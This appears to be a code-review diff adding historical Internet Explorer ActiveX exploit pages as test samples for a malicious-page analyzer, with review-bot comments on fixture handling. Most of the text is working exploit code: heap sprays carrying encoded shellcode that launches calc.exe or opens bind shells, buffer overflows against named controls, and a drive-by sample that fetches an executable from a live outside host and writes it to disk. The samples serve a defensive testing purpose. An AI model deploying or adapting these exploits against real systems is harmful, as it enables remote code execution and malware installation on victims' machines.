AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^Êÿ|ëYëèøÿÿÿIIIIIIIIIIIIIIIIIQZ7jJXP0B1ABkBAZB2BA2AA0AAX8BBPuzIYlm81T7pePUPLKG55lLKQlC5RXs1jOLKBoUHnkaOQ0TAzKsyLKUdNkwqZN4qiPLYnLK4o044VgjajjFmdAO2ZKl4Uk1D4dFd0uKUNkaOEtEQzKpfnkvlbkNkSo5LuQjKNkeLnkVaXkk9QLDdc4iS7AIPu4nkQPDpk5YPrXdLNkaPflNkPpELnMLKCXwxjKEYlKmPLpS0S0uPLK3XElcofQHvu0QFlIL8ncO0akRpbHXoxNm0u0bHNxinNjDNpWkOKWU3rAPl0cFNCUT8e5C0J")
+
+</script>
+</html>
+</body>
+
+
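Review bot: The closing tags at the end of the file are in the wrong order, with `</html>` appearing before `</body>`. Because this is a verbatim exploit sample whose fidelity to the original PoC is presumably what the analysis relies on, I would not normalize the markup, but a comment beside the existing provenance line (`<!-- markup kept as in the original PoC; do not normalize -->`) would record that the malformed ending is deliberate test input rather than a copy error. The provenance URL in the head comment is good practice; the other samples in this commit that lack one should get the same treatment.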
28 samples/exploits/22811_Elazar.html
@@ -0,0 +1,28 @@
+<!--
+written by e.b.
+-->
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+
+ while (s.length < 999999) s=s+s;
+
+ var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
+
+
+ obj.Import(s);
+ obj.PlayerProperty(s);
+
+
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+
+ </body>
+</html>
+
+
67 samples/exploits/2448.html
@@ -0,0 +1,67 @@
+<!--
+
+..::[ jamikazu presents ]::..
+
+Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
+Works on all Windows XP versions including SP2
+
+Author: jamikazu
+Mail: jamikazu@gmail.com
+
+Bug discovered by Computer H D Moore (http://www.metasploit.com)
+
+Credit: metasploit, SkyLined
+
+invokes calc.exe if successful
+
+-->
+
+<HTML>
+<BODY>
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+ var payLoadCode = unescape(
+ "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
+ "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
+ "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
+ "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
+ "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
+ "%uFF57%u63E7%u6C61%u0063");
+ var heapBlockSize = 0x400000;
+ var payLoadSize = payLoadCode.length * 2;
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+ var spraySlide = unescape("%u0505%u0505");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+
+ for ( i = 0 ; i < 128 ; i++)
+ {
+ try{
+ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
+ tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
+ }catch(e){}
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ }
+
+</SCRIPT>
+
+</BODY>
+</HTML>
+
+
47 samples/exploits/2575.html
@@ -0,0 +1,47 @@
+<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
+
+<SCRIPT language="JavaScript">
+var expires = new Date();
+expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
+var set_cookie = document.cookie.indexOf("3Ware=");
+if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
+document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
+var helloworld2Address = 0x0c0c0c0c;
+var shellcode = unescape("%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufef
e%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b");
+var hbshelloworld = 0x100000;
+var payLoadSize = shellcode.length * 2;
+var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
+var spraySlide = unescape("%u0c0c%u0c0c");
+
+function getSpraySlide(spraySlide, spraySlideSize) {
+ while (spraySlide.length*2<spraySlideSize) {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+}
+
+
+spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
+memory = new Array();
+for (i=0;i<heapBlocks;i++) {
+ memory[i] = spraySlide + shellcode;
+}
+
+
+var size_buff = 1070;
+var x = unescape("%0c%0c%0c%0c");
+while (x.length<size_buff) x += x;
+gl.FlvPlayerUrl = x;
+}
+
+</SCRIPT>
+<script>
+if (set_cookie == -1){
+location.reload();
+}
+</script>
+
+
+//Sebug.net
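Review bot: The `unescape(...)` string literal that begins on L802 is split across two lines — the first ends in `%ufef` and the next begins with `e%u96fe` — which, if that break is really in the file rather than a display wrap of a long line, leaves an unterminated string and a syntax error, so the script never reaches `gl.FlvPlayerUrl = x;` and the fixture exercises nothing but the HTML parser. Please confirm the on-disk line is intact and re-join it if it is not, so the sample behaves as the published copy does. Separately, the second script block only calls `location.reload()` when the `3Ware=` cookie is absent (L834-L836), so an analyzer that honours reload must persist cookies across the reload to avoid visiting the page twice; the expected single-pass result is worth recording alongside the sample.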
47 samples/exploits/2mix.html
@@ -0,0 +1,47 @@
+<SCRIPT language="javascript">
+ var p_url = "http://paksusic.cn/nuc/exe.php";
+function SS()
+{
+try{
+ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
+var arbitrary_file = p_url;
+var dest = 'C:/Program Files/Outlook Express/wab.exe';
+document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
+attack.SnapshotPath = arbitrary_file;
+setTimeout('window.location = "ldap://127.0.0.1"',2000);
+attack.CompressedPath = dest;
+attack.PrintSnapshot(arbitrary_file,dest);
+}catch(e){}
+}
+function WML()
+{
+document.write('<div id="replace">x</div>');
+var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
+"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
+"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
+"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
+"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
+"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
+"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
+"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
+"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
+"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
+"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
+"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u6B61%u7573%u6973%u2E63%u6E63%u6E2F%u6375%u652F%u6578%u702E%u7068");
+var psrayt = unescape("%u0a0a%u0a0a");
+do {
+ psrayt += psrayt;
+} while(psrayt.length < 0xd0000);
+meray = new Array();
+for(i = 0; i < 100; i++)
+ meray[i] = psrayt + srtkod;
+xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
+tag = document.getElementById("replace");
+tag.innerHTML = xmlcode;
+}
+
+if (WML()||SS()) { }
+</script>
+
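Review bot: This fixture points at a live third-party host — `p_url = "http://paksusic.cn/nuc/exe.php"` on L844, and what appears to be the same URL encoded at the tail of `srtkod` on L874 — so any test run that lets the analyzer follow URLs produces real egress to a domain that was presumably attacker-controlled when the sample was captured. The embedded URLs should be recorded as indicators in a sample manifest together with the expected verdict, and the harness should run these samples with network access blocked or stubbed. The same applies to the fetch-and-write samples 4226.html (L1283) and 4427.html (L1511).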
38 samples/exploits/3420.html
@@ -0,0 +1,38 @@
+<!--
+prdelka
+http://blogs.23.nu/prdelka
+
+I made a version of my winzip exploit that utilises the heap spray
+method with a bindshell for some project or other. you can download a
+copy here if its of use to you, note i used a different method courtesy
+of http://www.milw0rm.com/exploits/3055 - however i couldnt get their
+exploit to function. enjoy.
+-->
+
+<HTML>
+<HEAD>
+<meta http-equiv="refresh" content="0">
+<TITLE></TITLE>
+</HEAD>
+<BODY>
+<OBJECT ID="WZFILEVIEW" WIDTH=50 HEIGHT=50 CLASSID="clsid:A09AE68F-B14D-43ED-B713-BA413F034904"></OBJECT>
+<script type="text/javascript">
+shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
+//bindshell port 28876
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<900;i++) memory[i] = block + shellcode;
+var buf = 'A';
+while (buf.length < 512) buf+='\x09';
+WZFILEVIEW.CreateNewFolderFromName(buf);
+</SCRIPT>
+</BODY>
+</HTML>
+
+# milw0rm.com [2007-03-06]
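Review bot: `<meta http-equiv="refresh" content="0">` on L905 makes the page reload itself with no delay, so an analyzer that honours meta refresh will re-run the heap spray and the `WZFILEVIEW.CreateNewFolderFromName(buf)` call indefinitely unless it caps refresh depth or deduplicates already-visited URLs. It is worth confirming the engine has such a bound before this sample enters an automated run, and documenting the expected outcome (one detection, not a loop) next to the sample.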
BIN samples/exploits/36488084.sc
Binary file not shown.
BIN samples/exploits/39973780.sc
Binary file not shown.
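Review bot: The two binary files `36488084.sc` and `39973780.sc` are added with no description of what they are — presumably shellcode extracted from one of the HTML samples, but nothing in the commit says which one or how they were produced. A manifest entry (or a paragraph in README) recording each blob's origin sample, extraction method and digest, e.g. `36488084.sc  sha256:<HASH-PLACEHOLDER>  source: <origin-sample>.html`, would make the fixtures reproducible and let reviewers confirm the blobs match the expected extraction without executing them.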
44 samples/exploits/4042.html
@@ -0,0 +1,44 @@
+<html>
+<!--
+45 minutes of fuzzing!
+Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!
+
+link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
+maybe more vulz!
+
+Greetz to: str0ke and shinnai!
+-->
+<html>
+<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
+<script>
+shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (x=0; x<800; x++) memory[x] = block + shellcode;
+var buffer = '\x0a';
+while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
+target.server = buffer;
+target.initialize();
+target.send();
+</script>
+</html>
+sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
+
+# milw0rm.com [2007-06-07]
32 samples/exploits/4043.html
@@ -0,0 +1,32 @@
+<html>
+<object classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277' id='target'></object>
+<script>
+shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (x=0; x<800; x++) memory[x] = block + shellcode;
+var buffer = '\x0a';
+while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
+target.server = buffer;
+target.receive();
+</script>
+</html>
+
+# milw0rm.com [2007-06-07]
24 samples/exploits/4148.html
@@ -0,0 +1,24 @@
+<HTML>
+<HEAD>
+<META http-equiv=Content-Type content="text/html; charset=windows-1252">
+<SCRIPT type=text/javascript>
+
+function init()
+{
+var foo = "";
+
+for(var icount = 0; icount < 1060; icount++)
+{
+foo = foo + "x";
+}
+var ngssoftware;
+ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1");
+
+ngssoftware["PrepareToPostHTML"](foo);
+}
+//-->
+</SCRIPT>
+
+</HEAD>
+<BODY bgColor=#ffffff onload=init()>
+</BODY></HTML>
76 samples/exploits/4149.html
@@ -0,0 +1,76 @@
+<!--
+=======
+Summary
+=======
+Name: EnjoySAP, SAP GUI for Windows - Heap Overflow
+Release Date: 5 July 2007
+Reference: NGS00482
+Discover: Mark Litchfield <mark@ngssoftware.com>
+Vendor: SAP
+Vendor Reference: SECRES-290
+Systems Affected: All ASCII Versions
+Risk: High
+Status: Fixed
+
+========
+TimeLine
+========
+Discovered: 4 January 2007
+Released: 19 January 2007
+Approved: 29 January 2007
+Reported: 12 January 2007
+Fixed: 27 March 2007
+Published:
+
+===========
+Description
+===========
+EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The
+latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/
+
+When installing EnjoySAP, in appreciation of its vast size for being a
+client (around 500MB), there are an astounding 1102 ActiveX controls
+installed.
+
+A relatively brief examinaton of these controls, found a large number of
+instances that would terminate EnjoySAP process, there were a number that
+could create files on the file system (there unfortunately exists no
+ability to inject content into these created files) and a number of
+bufferoverruns.
+
+=================
+Technical Details
+=================
+Control - rfcguisink.rfcguisink.1
+
+Function - LaunchGui
+
+POC:
+-->
+
+<HTML>
+<HEAD>
+<META http-equiv=Content-Type content="text/html; charset=windows-1252">
+<SCRIPT type=text/javascript>
+
+function init()
+{
+var foo = "";
+
+for(var icount = 0; icount < 1800; icount++)
+{
+ foo = foo + "x";
+}
+var ngssoftware;
+ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1");
+
+ngssoftware["LaunchGui"](foo, 1, 1);
+}
+//-->
+</SCRIPT>
+
+</HEAD>
+<BODY bgColor=#ffffff onload=init()>
+</BODY></HTML>
+
+# milw0rm.com [2007-07-05]
131 samples/exploits/4158.html
@@ -0,0 +1,131 @@
+<!--
+/* PUBLIC SINCE MAY 31th 2007 */
+
+/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/
+____________________________________________________________________________
+NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll]
+Remote 0-day Exploit
+Risk Level: High
+Impact: Remote command execution
+Author: A. Alejandro Hernandez aka nitr0us <nitrousenador@gmail.com>
+Date: 24/03/07
+Mexico
+____________________________________________________________________________
+/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/
+
+I found this buffer overflow fuzzing NeoTraceExplorer.dll (an ActiveX Control) with ComRaider from iDefense.
+It has a method called TraceTarget() which can be exploited passing a large string (~486 bytes) due there's no boundary checking.
+
+Unfortunately, somebody else found this vulnerability few months ago, but this person didn't release an exploit ;)
+just published an advisory ( http://secunia.com/advisories/23463).
+
+First of all, this b0f cannot be exploitable with the classic technique (EIP points to an address that has a 'jmp esp') because
+each byte of the ret address MUST BE between 0x00 and 0x7f (ascii values), in other case, InternetExplorer will change
+the out-of-range bytes to 0x3f ('?' character) and EIP will point to and invalid address.
+Example:
+I've an 'jmp esp' @ 0x7c951eed in ntdll.dll, if I set the ret address to 0x7c951eed, when the buffer gets passed from
+Internet Explorer to TraceTarget(), it will overwrite EIP with: 0x7c3f1e3f (bullshit!).
+
+So, The Skylined's Heap Spraying technique comes into my mind... and here is, working so fuckin' fine =).
+
+TESTED ON: Windows XP SP 2 (Spanish) + Internet Explorer 7.0.5730.11 + NeoTracePro 3.25
+
+Greetz to: Crypkey, alt3kx, zonartm.org, dex, Optix, Nahual, ran.
+-->
+
+<html>
+ <head>
+ <title>
+ NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
+ </title>
+ </head>
+
+ <body bgcolor=black text=white link=white alink=white vlink=white>
+ <center>
+
+ <object classid="clsid:3E1DD897-F300-486C-BEAF-711183773554" id="NeoTracePro"></object>
+
+ <b>/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/</b><br><br>
+ NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit<br>
+ by <a href="mailto:nitrousenador@gmail.com">nitr0us</a><br>
+ <a href="http://www.genexx.org/nitrous/" target=_blank>www.genexx.org/nitrous/</a><br><br>
+
+ <input type="button" value="Exploit!" onClick="exploit()">
+
+ <script>
+ function exploit(){
+ var Target = ""; // Exploit string
+ var PwnEIP = 486; // bytes to reach EIP
+ var Ninja = "\x05\x05\x05\x05"; // ret address = 0x05050505
+ /* The fscking shellc0de, bind port 64876 [nitro ;)], encoded with Skylined's Alpha2 encoder and finally converted to utf-16 */
+ // $./msfpayload win32_bind LPORT=64876 R | ./msfencode -t raw -b '\x00' -e Alpha2 | ./beta --utf-16 > shellcode.txt
+ // beta encoder src: http://www.edup.tudelft.nl/~bjwever/src/beta.c
+ var ShellCode = unescape(
+ "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4937%u4949%u4949%u4949%u4949%u4949%u4949%u4949" +
+ "%u5a51%u626a%u3058%u3042%u4150%u416b%u7241%u4132%u4142%u3242%u4142%u4230%u5841%u4138" +
+ "%u5042%u7a75%u6b49%u434c%u585a%u726b%u4d6d%u5938%u4969%u496f%u696f%u516f%u4c70%u324b" +
+ "%u444c%u4164%u4e34%u476b%u4735%u4e4c%u636b%u744c%u3245%u5358%u5a31%u4c4f%u724b%u756f" +
+ "%u6e48%u536b%u576f%u3650%u4861%u636b%u4e79%u706b%u6c34%u644b%u6a41%u544e%u4f71%u4f30" +
+ "%u6e69%u6b4c%u4f34%u5130%u4464%u5a47%u3961%u545a%u444d%u6f41%u4a32%u494b%u6564%u426b" +
+ "%u6474%u7164%u6138%u5a65%u6e45%u636b%u656f%u6574%u7851%u556b%u6c36%u664b%u506c%u4c4b" +
+ "%u514b%u474f%u456c%u7851%u776b%u5473%u6e6c%u4e6b%u7269%u614c%u5734%u426c%u4f41%u4633" +
+ "%u4b51%u316b%u4c74%u714b%u5053%u4c30%u614b%u6650%u6c6c%u344b%u3730%u4c6c%u4c6d%u474b" +
+ "%u6730%u4178%u734e%u6e58%u326e%u766e%u5a6e%u764c%u4b30%u484f%u4256%u7246%u7573%u4336" +
